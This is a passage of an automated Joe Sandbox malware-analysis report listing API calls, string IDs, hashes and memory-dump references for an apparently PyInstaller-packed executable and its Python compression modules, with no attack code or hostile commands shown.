                                                                                                                                                                                                            • Instruction ID: 238f2ee890374b873e0ae4f2c860481d9d388a1c241e7ea0d52fdf56957ce68b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0700df6bf420ed018e7d1d079cb7901cd5b62d4c9962ab880261884f11276b6c
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC318E22A0AB8695EF608F29F85037D73A0FB85BC4F54413ADA4D467A8EF7CD155CB04
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285774096.00007FF8A7FF0000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285840197.00007FF8A807C000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285858890.00007FF8A8086000.00000004.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285876470.00007FF8A808C000.00000008.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285894286.00007FF8A8090000.00000002.00000001.01000000.00000025.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_$FormatString
                                                                                                                                                                                                            • String ID: item at offset %zd is too large for this platform$offset must be less than %zd$offset must be non-negative
                                                                                                                                                                                                            • API String ID: 4212644371-4235915021
                                                                                                                                                                                                            • Opcode ID: 107a9271cce8032e10f54d28ad269c3e1d5d24d506bb7d4b2dd9a9f2573d1f1f
                                                                                                                                                                                                            • Instruction ID: 64aba827d80e926b45a3aca8389eb027f6539ed9d952f33541f07bdbdb78ebf8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 107a9271cce8032e10f54d28ad269c3e1d5d24d506bb7d4b2dd9a9f2573d1f1f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 02210866B26F4291DF04CF66E88016833A1FB88FE4B054632DE1E477A4DF3CD4A68314
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE87AF1
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,00007FF7ACE83679), ref: 00007FF7ACE87B65
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACECC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285184571.00007FF7ACECE000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                            • String ID: Failed to encode wchar_t as UTF-8.$Failed to get UTF-8 buffer size.$Out of memory.$WideCharToMultiByte$win32_utils_to_utf8
                                                                                                                                                                                                            • API String ID: 3723044601-27947307
                                                                                                                                                                                                            • Opcode ID: 92b52a23bf177b804bd471eb00781d9ecb554dad94de0916a037b448ee798d7d
                                                                                                                                                                                                            • Instruction ID: 108a2f5d446a2246b8831e8ed74b1f0d2a16c46b9871131daed29ae2ceefcc1b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92b52a23bf177b804bd471eb00781d9ecb554dad94de0916a037b448ee798d7d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6B218031B0EB82A9EA10EF25A940079F3A2FB54BD1F994135DA4D637B5EF7CE4518310
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • BrotliEncoderCompressStream failed while flushing the stream, xrefs: 00007FF8A8189265
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$Eval_StringThread$Bytes_Err_FromRestoreSaveSize
                                                                                                                                                                                                            • String ID: BrotliEncoderCompressStream failed while flushing the stream
                                                                                                                                                                                                            • API String ID: 32558519-1331232432
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Err_FromLongLong_String
                                                                                                                                                                                                            • String ID: stream is closed$w*:readinto
                                                                                                                                                                                                            • API String ID: 1736172965-940828079
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DeallocSize$Arg_Buffer_CallMethod_Object_ParseReleaseTuple_
                                                                                                                                                                                                            • String ID: OOO:__exit__$close
                                                                                                                                                                                                            • API String ID: 1693501500-2153562444
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DeallocSize$Arg_Buffer_CallMethod_Object_ParseReleaseTuple_
                                                                                                                                                                                                            • String ID: OOO:__exit__$close
                                                                                                                                                                                                            • API String ID: 1693501500-2153562444
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Arg_Buffer_CallErr_Keywords_ObjectObject_ParseReleaseSizeStringTuple
                                                                                                                                                                                                            • String ID: cannot call compress() after compression finished$cannot perform operation before consuming output from previous operation$y*:compress
                                                                                                                                                                                                            • API String ID: 3333143287-2148570972
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Long$Arg_Buffer_FromKeywords_Long_ParseReleaseSizeTupleUnsigned
                                                                                                                                                                                                            • String ID: error when determining content size$y*:frame_content_size
                                                                                                                                                                                                            • API String ID: 2385634623-1697504724
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memmove$exit
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 987259897-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3286045317.00007FF8A8131000.00000020.00000001.01000000.00000022.sdmp, Offset: 00007FF8A8130000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a8130000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memmove$exit
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 987259897-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 00007FF8A801BFE3
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A801C00F
                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 00007FF8A801C054
                                                                                                                                                                                                            • DeleteCriticalSection.KERNEL32 ref: 00007FF8A801C061
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807702F
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077043
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077050
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807705D
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A8077090
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A807709D
                                                                                                                                                                                                              • Part of subcall function 00007FF8A8077010: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,00007FF8A7FF3BB3), ref: 00007FF8A80770B9
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A801C08C
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A801C0B2
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A801C10A
                                                                                                                                                                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8A801C149
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$free$Delete$ConditionVariableWake$EnterErrorLastLeaveObjectSingleWait
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3165725256-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8A801BC37,?,?,?,?,?,?), ref: 00007FF8A8076CE9
                                                                                                                                                                                                            • WakeAllConditionVariable.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8A801BC37,?,?,?,?,?,?), ref: 00007FF8A8076E37
                                                                                                                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF8A801BC37,?,?,?,?,?,?), ref: 00007FF8A8076E41
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$ConditionEnterLeaveVariableWake
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2831011342-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: f$p$p
                                                                                                                                                                                                            • API String ID: 3215553584-1995029353
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Long$FromLong_Unsigned$CriticalSection$DeallocEnterLeaveTuple_
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 1188863696-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                            • API String ID: 626452242-876015163
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CriticalSection$ConditionVariable$EnterLeaveWake$Sleep
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2423294567-0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CEAD
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CEBB
                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CEE5
                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CF2B
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,00007FF7ACE8D0DA,?,?,?,00007FF7ACE8CDCC,?,?,00000001,00007FF7ACE8C9E9), ref: 00007FF7ACE8CF37
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                            • String ID: api-ms-
                                                                                                                                                                                                            • API String ID: 2559590344-2084034818
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE879A0: MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7ACE867AF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF7ACE864BF
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82770: MessageBoxW.USER32 ref: 00007FF7ACE82841
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7ACE864D3
                                                                                                                                                                                                            • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7ACE86496
                                                                                                                                                                                                            • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7ACE8651A
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                            • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                                                                                                            • API String ID: 1662231829-3498232454
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Buffer_Object_Release$BufferCallDeallocMethod_Size
                                                                                                                                                                                                            • String ID: read
                                                                                                                                                                                                            • API String ID: 1205621341-2555855207
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Buffer_Object_Release$BufferCallDeallocMethod_Size
                                                                                                                                                                                                            • String ID: read
                                                                                                                                                                                                            • API String ID: 1205621341-2555855207
                                                                                                                                                                                                            • Opcode ID: 6630feee145a9f83c7cb0cd7104fd1d2f385eac3349607501728b6847737fd24
                                                                                                                                                                                                            • Instruction ID: cd38c352c1e569b55ec646028812cf96919f9b862bfe01eef72103dc6179e13f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6630feee145a9f83c7cb0cd7104fd1d2f385eac3349607501728b6847737fd24
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6F317022A1AB8192EB50CF20E4403BD73A0FB95B48F644235DE8D463A4EF7DD5E5D720
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE879DA
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7ACE876B4,?,?,?,?,?,?,?,?,?,?,?,00007FF7ACE8101D), ref: 00007FF7ACE82654
                                                                                                                                                                                                              • Part of subcall function 00007FF7ACE82620: MessageBoxW.USER32 ref: 00007FF7ACE8272C
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32 ref: 00007FF7ACE87A60
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                                                                                                            • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                                                                                                            • API String ID: 3723044601-876015163
                                                                                                                                                                                                            • Opcode ID: ee2ee3c888b621b3c3f4dc33b354bcabab4fe5f972038a38ac2187e11a85846b
                                                                                                                                                                                                            • Instruction ID: 59ce6404e3286414f3de503832cd4f8fe93af2fc6babc8c68ea61fcecd10c73e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee2ee3c888b621b3c3f4dc33b354bcabab4fe5f972038a38ac2187e11a85846b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2219132B0DA82A5EB50EB19F50007AE3A1EB987C5F9D4171DB4CA3BB9EF2DD5418710
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ConditionCriticalSectionVariableWake$EnterLeavefreemallocmemmove
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 3264682818-0
                                                                                                                                                                                                            • Opcode ID: 1f8f14fb59383042ed8859ee83df18ef6659cd133a4df1ce815ae7c0c0b2a1f9
                                                                                                                                                                                                            • Instruction ID: 49289befb415591c5d309b0d8b254c22a4d6787697ca8a9bd51dde56db5ef29b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f8f14fb59383042ed8859ee83df18ef6659cd133a4df1ce815ae7c0c0b2a1f9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08218B22A0AF4192EF258F25A40027863B4FF19BD4F161235DE9D027E8EF38D5A1C354
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A55F
                                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A574
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A595
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5C2
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5D3
                                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5E4
                                                                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF7ACEA2363,?,?,?,00007FF7ACE9CABC,?,?,00000000,00007FF7ACE9398F,?,?,?,00007FF7ACE99243), ref: 00007FF7ACE9A5FF
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff7ace80000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                                                                            • Opcode ID: 679a8f5ed95f4c44c4bc9ccb242736963b1e2f2654bfe38b80143c9ca5edf043
                                                                                                                                                                                                            • Instruction ID: d661c579c551c39ec14e56aea77414dc34ef77d06e05bd30556e993f60abf717
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 679a8f5ed95f4c44c4bc9ccb242736963b1e2f2654bfe38b80143c9ca5edf043
                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3218E30B0F24262FA6873215645139E2525F447B4FD64774F93E7B7FAEE2CE8508221
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Arg_Buffer_Err_FormatKeywords_ParseReleaseSizeTuple
                                                                                                                                                                                                            • String ID: could not determine frame header size: %s$y*:frame_header_size
                                                                                                                                                                                                            • API String ID: 2231244333-4115140356
                                                                                                                                                                                                            • Opcode ID: 5c7bdbf753c40b503e25d8c69c6edf90da0d6e358ece52936f2ba7ce0c833419
                                                                                                                                                                                                            • Instruction ID: 1fa8a9334fe41d93c4419b33fdc242b11785564ca0087ba2c5fdfb4f8dd47980
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c7bdbf753c40b503e25d8c69c6edf90da0d6e358ece52936f2ba7ce0c833419
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1221FF21B2AA46A2EF508B21E844B7D6350FF55BE0F454231D86E467E4DF7CE255C308
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285791196.00007FF8A7FF1000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF8A7FF0000, based on PE: true
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_7ff8a7ff0000_app.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Arg_CallDeallocErr_Keywords_ObjectObject_ParseSizeStringTuple
                                                                                                                                                                                                            • String ID: write_size must be positive$|k:decompressobj
                                                                                                                                                                                                            • API String ID: 3366672808-3369549627
                                                                                                                                                                                                            • Opcode ID: 3c4fee81611e65eb09b3641140ab0b83dfce37c2912815ba2c0d923bc666c9d5
                                                                                                                                                                                                            • Instruction ID: 79a67612cd233e48f52cdb67f3dbdb708bfc35d9b80e52332e3cfda653ebc838
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c4fee81611e65eb09b3641140ab0b83dfce37c2912815ba2c0d923bc666c9d5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18218921B0AA42A1EF008F25F84037A63A0FF88BD4F484031DA5D877A8DF7CD6A5C704
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.3285089156.00007FF7ACE81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7ACE80000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285072056.00007FF7ACE80000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285112439.00007FF7ACEAA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEBD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.3285133542.00007FF7ACEC0000.00000004.00000001.01000000.00000003.sdmp
